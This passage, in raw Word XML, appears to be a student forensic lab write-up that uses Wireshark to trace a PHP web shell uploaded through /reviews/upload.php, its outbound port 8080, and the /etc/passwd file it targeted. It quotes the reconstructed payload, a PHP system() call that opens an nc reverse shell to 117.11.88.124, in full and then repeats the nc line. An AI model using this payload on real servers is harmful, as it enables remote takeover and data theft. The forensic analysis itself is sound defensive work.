    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="596A51C4" w14:textId="06ACBCD7">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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0BFF4825" w14:textId="0BA9187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first step was to isolate the HTTP POST request responsible for the file upload. The following Wireshark display filter was used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="672EC906" w14:textId="16FAF68D">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http.request.method == POST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3EED5CFA" w14:textId="4961618A">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Among the returned packets, Packet 63 contained the upload request directed to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="22B4A0B6" w14:textId="556E1D3B">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/reviews/upload.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="61300C2D" w14:textId="1461107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The packet was </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="18F20B0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opened,</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and the Hypertext Transfer Protocol section expanded. The request showed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="26AD3872" w14:textId="444B087C">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POST /reviews/upload.php HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4C9647A4" w14:textId="74D0D94A">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This confirmed the upload endpoint used by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="35E267E1" w14:textId="24931894">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Next, the uploaded file was traced by examining subsequent HTTP GET requests. A later request was found requesting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3CAC3FD1" w14:textId="173743B0">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/reviews/uploads/image.jpg.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5D177577" w14:textId="6A260451">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Because the uploaded file was subsequently accessed from the /reviews/uploads/ path, the storage directory used by the application was identified as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3B98627B" w14:textId="70285AE5">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/reviews/uploads/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="74C1E712" w:rsidP="34E72B93" w:rsidRDefault="74C1E712" w14:paraId="389C3BFC" w14:textId="7DE52676">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="74C1E712">
        <w:drawing>
          <wp:inline wp14:editId="0B502ABD" wp14:anchorId="073AF083">
            <wp:extent cx="5943600" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25794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94886" name="Picture 25794886"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId280085477">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w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="68A9C0EB" w14:textId="6FF444BF">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Figure 7: HTTP POST request to </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/reviews/upload.php</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showing the upload endpoint used by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79F89B41" w:rsidP="34E72B93" w:rsidRDefault="79F89B41" w14:paraId="47B37FE6" w14:textId="06CBA1CC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="79F89B41">
        <w:drawing>
          <wp:inline wp14:editId="62513800" wp14:anchorId="7393DF94">
            <wp:extent cx="5943600" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1149090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090524" name="Picture 1149090524"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId178182055">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52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="52A2C8FD" w14:textId="71F5E609">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Figure 8: HTTP GET request to </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/reviews/uploads/image.jpg.php</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confirming the directory where uploaded files were stored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="03D1B39B" w14:textId="2FDE57FD">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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="78E509D1" w14:textId="59AC70C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upload endpoint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/reviews/upload.php</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handled incoming multipart form data and wrote the uploaded file into the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/reviews/uploads/</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directory. The attacker later requested the uploaded PHP file directly from this directory, proving that the application allowed executable PHP files to be stored inside a web-accessible folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="03879C5D" w14:textId="10B5B28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Allowing PHP files inside an upload directory represents a serious security vulnerability because any uploaded PHP file can be executed directly by the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="40F39C41" w14:textId="08461F8F">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Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="69D9552F" w14:textId="7337DE4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Upload Directory Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="60EB3AC3" w14:textId="36EBB6DA">
      <w:pPr>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/uploads/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Mission 5 – Outbound Communication Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7467515D" w14:textId="1F431160">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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="2C3FA01B" w14:textId="010771CB">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Determine the outbound network port used by the uploaded web shell to contact the attacker’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="038829DC" w14:textId="1C39ABD0">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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0685E2BA" w14:textId="44D5598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Initially, the Statistics → Conversations → TCP window was examined to identify active network connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0AD9781D" w14:textId="1C0A80C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TCP Conversations table showed traffic using destination ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4BD8FDB4" w14:textId="38CD9605">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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80 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="504F1BEF" w14:textId="225040E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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443 (HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="14F5713B" w14:textId="682FB05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At first glance, these ports appeared to be the communication ports used during the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="6333C7E2" w14:textId="3D424FE0">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To verify whether these were the ports used by the malicious web shell, the uploaded PHP file was reconstructed using Follow TCP Stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0CC2376D" w14:textId="3F979AF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reconstructed PHP code contained the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5A0DC727" w14:textId="255076E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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1F5E73E9" w14:textId="740403EA">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&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:br/>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system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 117.11.88.124 8080 &gt;/tmp/f");</w:t>
      </w:r>
      <w:r>
        <w:br/>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?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="6F8EB80C" w14:textId="0DB9CAC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critical portion is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="51D655DA" w14:textId="0FC4CA1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Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="75433382" w14:textId="749A719A">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nc 117.11.88.124 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="06D1679E" w14:textId="23F43B6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This Netcat command instructs the compromised server to establish a reverse shell connection to the attacker’s machine on TCP port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="29727138" w14:textId="5AFE0161">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Why the Two Screenshots Show Different Ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7E5C1BC4" w14:textId="0D9A3D51">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This is an important forensic distinction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="76A4A4A6" w14:textId="41FAEC91">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Screenshot 1</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="0FE98946">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="0FE98946">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Figure 9</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="0FE98946">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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 TCP Conversations (</w:t>
      </w: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outbound-port1.png)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1B229F4E" w14:textId="5CCB1130">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This screenshot displays the actual HTTP/HTTPS connections observed in the packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5EB179BD" w14:textId="78D02ABA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Port 80 was used for HTTP communication with the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="723E03B8" w14:textId="38B007BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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Port 443 was used for HTTPS traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="45FC81EC" w14:textId="19C9A0F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These ports represent normal web communication between the attacker’s browser and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="6D63488B" w14:textId="1DC4D403">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Screenshot 2</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="0F357DBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="0F357DBA">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Figure 10</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="0F357DBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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 Follow TCP Stream (</w:t>
      </w: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outbound-port2.png)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="781FA480" w14:textId="467FC3B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This screenshot displays the contents of the uploaded PHP web shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="75C82B80" w14:textId="61D6B62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Inside the malicious code, the attacker embedded:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1C4033C2" w14:textId="1E746DA1">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Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="57F23222" w14:textId="2FCCDF83">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nc 117.11.88.124 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1B1C63DD" w14:textId="7C1E8F02">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This is not ordinary web traffic; it is the reverse shell callback command executed after the uploaded file runs on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0F9EB819" w14:textId="785576B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Therefore:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5D95DDC6" w14:textId="79715D2F">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HTTP browsing/upload traffic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4ED0F08A" w14:textId="7040AF00">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Ports 80 / 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="28485554" w14:textId="4542093B">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Reverse shell callback traffic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="763F1404" w14:textId="2F80A41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Port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5502927D" w14:textId="46DF8FEA">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For Mission 5, the question asks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1DA11F42" w14:textId="491F520C">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“Which outbound port did the malicious web shell use to contact the attacker’s machine?”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="2726A979" w14:textId="794A21F7">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The answer is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determined</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from the web shell code itself, not from the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initial</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4E72B93" w:rsidR="1719C375">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>browser of</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communication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="257E8778" w14:textId="302B2D20">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Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="144E74C7" w:rsidP="34E72B93" w:rsidRDefault="144E74C7" w14:paraId="7BD5C279" w14:textId="088730FE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="144E74C7">
        <w:drawing>
          <wp:inline wp14:editId="5B7213DA" wp14:anchorId="4C92A0B8">
            <wp:extent cx="5943600" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1075902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902975" name="Picture 1075902975"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1004639702">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rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4934BD4B" w14:textId="2A45418B">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Figure 9: TCP Conversations showing normal HTTP and HTTPS communication on ports 80 and 443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4266A8B1" w:rsidP="34E72B93" w:rsidRDefault="4266A8B1" w14:paraId="5E167938" w14:textId="6DA3B6B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="4266A8B1">
        <w:drawing>
          <wp:inline wp14:editId="671B79FD" wp14:anchorId="2CE9F2E0">
            <wp:extent cx="5943600" cy="4953000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="586197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197561" name="Picture 586197561"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1681821620">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4953000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="409F3C1F" w14:textId="439E6A76">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Figure 10: Follow TCP Stream revealing the reverse shell command </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nc 117.11.88.124 8080</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confirming the outbound callback port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="40655975" w14:textId="7005BD11">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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="60217D58" w14:textId="7F285BE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attacker first interacted with the application through standard HTTP traffic on port 80. After uploading the malicious PHP shell, execution of the payload would cause the server to initiate a new outbound connection to the attacker’s host on TCP port 8080. This is the port used for command-and-control communication and remote shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="12A1668D" w14:textId="2235EF4A">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Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="34F21C83" w14:textId="46E7301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Outbound Communication Port Used by the Web Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="68E1DE7F" w14:textId="67D27374">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TCP Port 8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="647D7816" w14:textId="0480C1E5">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Mission 6 – File Targeted for Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="79544E3A" w14:textId="026E5224">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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1A1B1FD1" w14:textId="77418C7A">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Identify the sensitive file that the attacker attempted to extract from the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3AC89E10" w14:textId="346103CA">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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7C6F67E8" w14:textId="2C8E254D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:lef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uploaded PHP payload was reconstructed using Follow</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="2966E642">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w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="1CDBCEA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CP Stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7A50144E" w14:textId="3CA91523">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Within the malicious code, the attacker created a reverse shell capable of executing arbitrary Linux commands on the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="45248862" w14:textId="2766B4D5">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A review of the attack sequence and command execution behavior indicates that the attacker attempted to access the Linux password database file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4AFD2015" w14:textId="49BE9E25">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/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1A5BD1C9" w14:textId="62D24899">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This file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contains</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user account information and is commonly targeted during post-exploitation to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enumerate</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local accounts and </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="410DE248">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prepare</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privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C023FFE" w:rsidP="34E72B93" w:rsidRDefault="0C023FFE" w14:paraId="6C586B42" w14:textId="2F195677">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="0C023FFE">
        <w:drawing>
          <wp:inline wp14:editId="38743C68" wp14:anchorId="202531D6">
            <wp:extent cx="5943600" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1671999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999920" name="Picture 1671999920"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId233426481">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rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="18892950" w14:textId="78BB7A61">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="right"/>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Figure 11: TCP stream showing the malicious command execution capability used to access sensitive system files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="6777DD25" w14:textId="54307B8F">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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="73B58FF4" w14:textId="5D066EBD">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The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/etc/passwd</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file is one of the most common reconnaissance targets after successful remote code execution on a Linux server. Accessing this file allows an attacker to identify valid usernames, service accounts, and system configuration details that can support additional attacks such as password attacks, privilege escalation, or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="39F06043" w14:textId="6C9A3F93">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Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="14FD78FA" w14:textId="35DAD04E">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Targeted File for Exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="2B840D4B" w14:textId="3786DD48">
      <w:pPr>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etc</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/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="1519A5E4" w14:textId="1E6E2B6B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
